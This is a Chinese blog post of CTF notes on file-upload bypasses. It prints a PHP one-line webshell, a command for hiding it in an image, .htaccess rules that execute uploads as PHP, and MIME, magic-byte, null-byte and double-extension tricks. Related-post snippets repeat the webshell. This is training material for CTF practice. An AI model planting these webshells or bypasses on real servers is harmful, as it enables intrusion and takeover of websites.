ctf技能树----文件上传

已于 2022-07-11 09:06:32 修改
阅读量1.1k 收藏 7
点赞数 2
分类专栏: web相关 文章标签: 网络安全
于 2022-05-10 21:14:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44418229/article/details/124692805
版权

前置工具:中国蚁剑

1.正常的一句话木马

<?php
eval($_POST["pass"]);

2.图片马

通过copy进行合成

copy name1.png/b+name2.php/a name3.php
name1 为图片的名字
/b表示二进制文件

name2 为一句话木马文件
/a表示ASCII码文件

name3为合成后的图片名字

上传时需要通过burp_suite修改下Content-Type : image/png 

3.禁用JavaScript

在设置中,搜索JavaScript后禁用掉

4.MIME绕过

通过burp_suite修改文件的类型

5.文件头检测

通过burp_suite修改文件头部的标识符,让防火墙误以为是图片

89 50 4E 47即为图片的标识码

6.添加GIF89a绕过

原理就是让防火墙误以为这个是图片

GIF        GIF 89A

JPEG(JPG)        FFD*FF

PNG        89504E87

小技巧:找到加的位置:在<?php 前放四个+号,然后取Hex中修改

 7. 通过.htaccess绕过

构造.htaccess文件

1.匹配文件名当作php执行

<FilesMatch "asdf">
    SetHandler application/x-httpd-php
</FilesMatch>

2.将png当作php执行(不太好使)

AddType aoolication/x-httpd-php .png

8.00截断

发生截断的两个条件:

php< 5.3.4

magic_quotes_gnc = off

题目描述:上传后题目没有返回文件名

说明这道题涉及到重命名的问题,因此,加入截断字符,打断重命名

解法:

1.上传图片马

2.在url栏截断,不让系统重命名

3.访问:

蚁剑连接: 

http://challenge-98be3014d8744500.sandbox.ctfhub.com:10800/upload/1.php

9.双写绕过

后缀名写两次,让它删

如.pphphphpp 拆开看:p(php)h(php)p

10.修改文件名解析

 看图,源码提示会将文件以python来解析并且只接受后缀名为 .jpg和.png的文件,因此我们调用python中的os库,来执行远程代码执行命令

 

将文件的后缀名修改下变为 11.png

成功拿到flag 

jjj34
关注
专栏目录
CTF-Web-Challenge:使用PHP在Web中进行CTF挑战
03-25
了解如何安全地处理用户上传、文件路径处理和文件权限是防止文件系统漏洞的关键。 4. **函数和过滤**:不安全的函数使用可能导致漏洞,如`eval()`、`exec()`等。学会使用过滤和验证函数,如`htmlspecialchars()`、`...
CTF文件上传(知识点+例题)(1)
qq_53099119的博客
03-23 5645
有的站点会出现仅进行了前端校验的情况(一切在前端做的安全防护,都是耍流氓),由于前端页面的源码是我们可以随意更改的,因此可以通过找到进行过滤的指令,更改成我们想要的功能即可。假设接下来就可以上传一个名为1.png的木马文件,植入后门,将其上传后,该文件虽文件后缀名为png,但会被当作php类型的文件进行解析,其中的一句话木马也能够被正常执行。因此,通过使用.user.ini,我们可以任意指定包含一个文件,这个文件可以是我们自己上传的木马文件,从而通过该木马文件提供后门来获取当前服务器的webshell。
CTFHub-Web-文件上传
qq_54037445的博客
11-29 3161
htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能;前端会验证,只能上传图片中列出的类型将文件名后缀含有的这些全部替换为空。
CTF-文件上传(文件包含)总结
最新发布
2302_78903258的博客
07-21 1546
攻击者在入侵了一个网站后,通常会将这些asp或php后门文件与网站服务器web目录下正常的网页文件混在一起,然后使用浏览器来访问这些后门,得到一个命令执行环境,以达到控制网站服务器的目的(可以上传下载或者修改文件,操作数据库,执行任意命令等)。php的文件包含机制是将已经包含的文件与文件的真实路径放进哈希表中,正常情况下,PHP会将用户输入的文件名进行resolve,转换成标准的绝对路径,这个转换的过程会将…来实现的,它会检查左侧的表达式是否为 null,如果是则使用右侧的默认值。以及 fd 怎么办呢?
ctf-web入门-文件上传
whisper921的博客
05-28 4153
Web 151 考点:后端无验证,前端校验 查看源码可以发现只能上传png图片 修改为php 写一个php文件上传一句话木马 可以发现已经成功上传 查看上级目录发现可疑文件 查看flag.php文件内容得出flag 得到flag Web 152 考点:绕过前端校验 解题思路: 经过一系列的方法测试上题的解题方法并不适用于本题。直接改前端,后端会校验,文件不合格。那就抓包一下。 将Content-Type内容修改成image/png,重发,发现成...
【web-ctfctf-pikachu-fileupload
一个努力生活的人的博客
08-21 1232
ctf-pikachu-fileupload
文件上传漏洞详解(CTF篇)
热门推荐
nobugnomoney的博客
09-16 1万+
需要了解的前置知识: 1.什么是文件上传文件上传就是通过流的方式将文件写到服务器上 文件上传必须以POST提交表单 表单中需要 <input type="file" name="upload"> 2.一句话木马 <?php eval($_POST['a']) ?> 其中eval就是执行命令的函数,**$_POST[‘a’]**就是接收的数据。eval函数把接收的数据当作PHP代码来执行。这样我们就能够让插入了一句话木马的网站执行我们传递过去的任意PHP语句。这便是一句话木马
河南省网络安全高校战队联盟CTF训练营-web文件上传第一期
04-22
"河南省网络安全高校战队联盟CTF训练营-web文件上传第一期" 这个标题揭示了本次训练的主题,主要聚焦于网络安全领域中的一项重要技能——Web文件上传漏洞的利用与防御。CTF(Capture The Flag)是网络安全竞赛的一种...
CTF-AWD-WEB:AWD 模式下的WEB试题仓库
05-17
4. **文件包含漏洞**:了解如何通过文件包含漏洞执行任意代码,以及防御措施,如限制可包含文件类型、使用绝对路径和禁止远程文件包含。 5. **权限与配置管理**:学习如何利用不正确的权限设置或配置,如目录遍历和...
麟阁CTF天梯赛ftp-smtp
12-22
2. FTP命令如“USER”、“PASS”用于身份验证,“LIST”获取目录信息,“GET”和“PUT”用于文件上传和下载。 3. FTP有两种模式:主动模式(服务器发起数据连接)和被动模式(客户端发起数据连接),后者常用于...
CTF-writeup
03-19
3. **文件I/O**:在某些挑战中,JavaScript可能被用来读取、写入或上传文件。了解如何在浏览器环境中限制和绕过这些限制是解决此类问题的关键。 4. **浏览器API滥用**:CTF中经常利用不常见的浏览器API进行攻击或...
小白的ctf之路之文件上传浅谈
glass_york的博客
01-12 1696
文件上传
web安全-文件上传漏洞-图片马制作-相关php函数讲解-upload靶场通关详细教学(3)
ran的博客
01-30 6467
getimagesize() 函数将测定任何 GIF,JPG,PNG,SWF,SWC,PSD,TIFF,BMP,IFF,JP2,JPX,JB2,JPC,XBM 或 WBMP 图像文件的大小并返回图像的尺寸以及文件类型及图片高度与宽度。的知识,比如我们平时在进行文件上传时,在我们上传文件后,网站会对图片进行二次处理(格式、尺寸、保存、删除要求等),服务器会把里面的内容进行替换更新,处理完成后,根据我们原有的图片生成一个新的图片(标准化)并放到网站对应的标签进行显示。
[HXPCTF 2021]includer‘s revenge
rev1ve的博客
11-12 440
这种情况下我们还是可以在对应的 /proc/PID/fd 下找到我们删除的文件 ,虽然显示是被删除了,但是我们依然可以读取到文件内容,所以我们可以直接用php 进行文件包含。但是最后一个问题就是,既然我们要去包含 Nginx 进程下的文件,我们就需要知道对应的 pid 以及 fd 下具体的文件名,怎么才能获取到这些信息呢?这时我们就需要用到文件读取进行获取 proc 目录下的其他文件了,这里我们只需要本地搭个 Nginx 进程并启动,对比其进程的 proc 目录文件与其他进程文件区别就可以了。
buuctf文件上传漏洞(Pass1~15)
yxzrw_TW的博客
10-21 1538
文件上传漏洞笔记
攻防_漏洞_文件上传_文件上传漏洞详解
redglare的博客
10-22 2422
文件上传漏洞详解
CTFHub-文件上传-js前端验证
qq_60905276的博客
11-18 1511
1.关闭js前端验证通过 F12右上角...处的设置,禁用js就可以通过js前端验证。 然后用蚁剑查看就行了。 2.bp改包绕过 一般的php文件是在经过js前端检验后是上传不了的。 先将文件改为png的形式绕过js,再用bp改包为php文件就行了。 改为 , ...
小白的CTF之路之文件上传(三)
glass_york的博客
01-14 380
文件上传
CTFshow Web入门 文件上传
m0_62905261的博客
10-05 851
CTFshow Web入门 文件上传
ctf技能树文件上传.htaccess
04-30
文件上传漏洞通常是指在网站中存在对用户上传文件的功能,但是没有对上传文件的类型、大小、数量、路径等进行严格限制或过滤,从而导致攻击者可以通过上传包含恶意代码的文件来实现攻击的目的。而.htaccess是一个常...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

jjj34

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值